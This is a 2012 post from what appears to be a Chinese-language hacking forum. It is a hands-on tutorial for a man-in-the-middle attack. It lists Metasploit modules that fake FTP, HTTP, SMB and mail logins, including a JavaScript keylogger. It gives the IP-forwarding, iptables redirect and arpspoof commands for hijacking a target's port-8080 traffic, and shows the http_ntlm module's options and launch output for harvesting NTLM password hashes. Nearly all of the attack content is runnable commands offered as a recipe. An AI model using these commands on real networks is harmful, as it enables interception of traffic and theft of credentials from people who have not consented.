切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
38: 中间人攻击 dsniff 之 端口欺骗配合MSF[复制链接]
发表于 2012-8-12 22:55:37 | 显示全部楼层 |!read_mode!

抱歉这几天电脑坏了 操

首先说metasploit的欺骗模块:

  1. use auxiliary/server/capture/ftp   //伪造FTP
  2. use auxiliary/server/capture/http   //伪造HTTP
  3. use auxiliary/server/capture/http_javascript_keylogger   //伪造登录记录密码
  4. use auxiliary/server/capture/http_ntlm   //伪造HTTP协议获得SMB会话HASH
  5. use auxiliary/server/capture/imap            //伪造IMAP
  6. use auxiliary/server/capture/pop3    //伪造邮箱
  7. use auxiliary/server/capture/smb          //伪造共享
  8. use auxiliary/server/capture/smtp    //伪造SMTP
  9. use auxiliary/server/capture/telnet   //伪造TELNET
复制代码
决定好要伪造什么 ? 我想伪造个8080端口的HTTP协议获得SMB会话HASH界面,首先进行端口欺骗 8080

  1. root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward
  2. root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 8080 -j REDIRECT
  3. root@Dis9Team:~# iptables -A FORWARD -j ACCEPT
  4. root@Dis9Team:~# arpspoof -t 5.5.5.129 5.5.5.2
  5. 0:c:29:84:4c:9d 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.2 is-at 0:c:29:84:4c:9d
  6. 0:c:29:84:4c:9d 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.2 is-at 0:c:29:84:4c:9d
复制代码
进入MSF生成

  1. msf  auxiliary(http_ntlm) > show options

  2. Module options (auxiliary/server/capture/http_ntlm):

  3.    Name        Current Setting   Required  Description
  4.    ----        ---------------   --------  -----------
  5.    CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
  6.    CHALLENGE   1122334455667788  yes       The 8 byte challenge
  7.    JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
  8.    SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  9.    SRVPORT     8080              yes       The local port to listen on.
  10.    SSL         false             no        Negotiate SSL for incoming connections
  11.    SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
  12.    SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  13.    URIPATH                       no        The URI to use for this exploit (default is random)

  14. msf  auxiliary(http_ntlm) > set URIPATH /
  15. URIPATH => /
  16. msf  auxiliary(http_ntlm) > exploit
  17. [*] Auxiliary module execution completed

  18. [*] Using URL: http://0.0.0.0:8080/
  19. [*]  Local IP: http://5.5.5.128:8080/
  20. [*] Server started.
  21. msf  auxiliary(http_ntlm) >
复制代码

当目标访问任何8080端口 就被劫持到本地



微观MSF终端 获得HASH






附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2012-8-12 23:31:02 | 显示全部楼层
用dsniff 的Arpspoof开始网络交换 arpspoof -t 目标 网关
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-27 23:33

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部